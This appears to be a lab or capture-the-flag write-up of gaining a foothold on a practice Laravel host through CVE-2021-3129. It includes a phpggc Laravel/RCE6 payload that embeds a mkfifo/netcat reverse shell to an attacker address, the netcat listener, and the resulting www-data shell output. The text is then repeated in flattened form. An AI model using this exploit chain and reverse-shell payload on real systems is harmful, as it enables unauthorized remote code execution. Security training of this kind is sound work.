Foothold

Press enable first

$ cp /var/lib/inetsim/http/fakefiles/sample.jpg .

Picture didnt show up so I browsed to /uploads and received the following

$ git clone https://github.com/zhzyker/CVE-2021-3129.git         
Cloning into 'CVE-2021-3129'...
remote: Enumerating objects: 348, done.
remote: Counting objects: 100% (348/348), done.
remote: Compressing objects: 100% (242/242), done.
remote: Total 348 (delta 68), reused 322 (delta 57), pack-reused 0 (from 0)
Receiving objects: 100% (348/348), 1.73 MiB | 7.13 MiB/s, done.
Resolving deltas: 100% (68/68), done.

Add our sessions cookie to the exploit as headers

...

header={
    "Accept": "application/json",
    "Cookie": "XSRF-TOKEN=eyJpdiI6IlBmSDlBcFU2eGVKOGc5QXUrcldWbWc9PSIsInZhbHVlIjoiaUlYUGJQakwxYUw1SVRmTTlnZFNWMlJRc3VOWm5EL2paRFc2S0IrN3M3L0MwZTFIeUtxK2R3QUEyYzF4M2QzUHZPd3QrYkVGU3NDZkRUa2ZXYnc1UWNCWU4xeW5ETXd4T3MxOG9lLzVuemt5U0xlcldqb0FMSXIraDQ0OThvVWQiLCJtYWMiOiJlY2IzMjNjOWM0MzdhNzE1NTcxY2JhYmNkYWZmZjBjZDE3MzZiNzgwMDhjNTk4ZTBhZjk4YjcyNWYyMzNiMTFlIn0%3D; lavita_session=eyJpdiI6IndrSnltdjhWVWxTUVdOOVFOUnlaN1E9PSIsInZhbHVlIjoiUVdWcGZxdC9KNk5WaHpaTG1IZGl3OEN6dW9YUDNQSjlLcnoxYUxsWStaTTZKS25LZEcxR2dsUSs0WWtxd0YvQnhYZUJQQWwyL213YkIvRDdjTWRlREFpOWZEQmdjbjBPRFpZb3VqY0pkK081UThsU0s0cC9jb0o5ekl2UmdLbzEiLCJtYWMiOiJhYWJkOTM3ZDNjNDIyM2MzOTc2YTZjY2Y2MTA0YTM4ZjNkNDUyZTg0Y2QwOWY3MmI4MDI3M2ViNzM4NjRhMDc3In0%3D" 
}

...

$ python3 exp.py http://192.168.111.38/home

Edit payload in RCE6

...

"Laravel/RCE6":r"""
         php -d "phar.readonly=0" ./phpggc Laravel/RCE6 "system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.168 1337 >/tmp/f');" --phar phar -o php://output | base64 -w 0 | python -c "import sys;print(''.join(['=' + hex (ord(i))[2:] + '=00' for i in sys.stdin.read()]).upper())"

...

$ python3 exp.py http://192.168.111.38/home

$ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.45.168] from (UNKNOWN) [192.168.111.38] 40010
/bin/sh: 0: can't access tty; job control turned off
$ whoami && ip a
www-data
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:bf:c7:ba brd ff:ff:ff:ff:ff:ff
    altname enp11s0
    inet 192.168.111.38/24 brd 192.168.111.255 scope global ens192
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:febf:c7ba/64 scope link 
       valid_lft forever preferred_lft forever

Previous80 NextPriv Esc

Last updated 5 months ago

$ git clone https://github.com/zhzyker/CVE-2021-3129.git Cloning into 'CVE-2021-3129'... remote: Enumerating objects: 348, done. remote: Counting objects: 100% (348/348), done. remote: Compressing objects: 100% (242/242), done. remote: Total 348 (delta 68), reused 322 (delta 57), pack-reused 0 (from 0) Receiving objects: 100% (348/348), 1.73 MiB | 7.13 MiB/s, done. Resolving deltas: 100% (68/68), done.

... header={ "Accept": "application/json", "Cookie": "XSRF-TOKEN=eyJpdiI6IlBmSDlBcFU2eGVKOGc5QXUrcldWbWc9PSIsInZhbHVlIjoiaUlYUGJQakwxYUw1SVRmTTlnZFNWMlJRc3VOWm5EL2paRFc2S0IrN3M3L0MwZTFIeUtxK2R3QUEyYzF4M2QzUHZPd3QrYkVGU3NDZkRUa2ZXYnc1UWNCWU4xeW5ETXd4T3MxOG9lLzVuemt5U0xlcldqb0FMSXIraDQ0OThvVWQiLCJtYWMiOiJlY2IzMjNjOWM0MzdhNzE1NTcxY2JhYmNkYWZmZjBjZDE3MzZiNzgwMDhjNTk4ZTBhZjk4YjcyNWYyMzNiMTFlIn0%3D; lavita_session=eyJpdiI6IndrSnltdjhWVWxTUVdOOVFOUnlaN1E9PSIsInZhbHVlIjoiUVdWcGZxdC9KNk5WaHpaTG1IZGl3OEN6dW9YUDNQSjlLcnoxYUxsWStaTTZKS25LZEcxR2dsUSs0WWtxd0YvQnhYZUJQQWwyL213YkIvRDdjTWRlREFpOWZEQmdjbjBPRFpZb3VqY0pkK081UThsU0s0cC9jb0o5ekl2UmdLbzEiLCJtYWMiOiJhYWJkOTM3ZDNjNDIyM2MzOTc2YTZjY2Y2MTA0YTM4ZjNkNDUyZTg0Y2QwOWY3MmI4MDI3M2ViNzM4NjRhMDc3In0%3D" } ...

... "Laravel/RCE6":r""" php -d "phar.readonly=0" ./phpggc Laravel/RCE6 "system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.168 1337 >/tmp/f');" --phar phar -o php://output | base64 -w 0 | python -c "import sys;print(''.join(['=' + hex (ord(i))[2:] + '=00' for i in sys.stdin.read()]).upper())" ...

$ nc -lnvp 1337 listening on [any] 1337 ... connect to [192.168.45.168] from (UNKNOWN) [192.168.111.38] 40010 /bin/sh: 0: can't access tty; job control turned off $ whoami && ip a www-data 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000 link/ether 00:50:56:bf:c7:ba brd ff:ff:ff:ff:ff:ff altname enp11s0 inet 192.168.111.38/24 brd 192.168.111.255 scope global ens192 valid_lft forever preferred_lft forever inet6 fe80::250:56ff:febf:c7ba/64 scope link valid_lft forever preferred_lft forever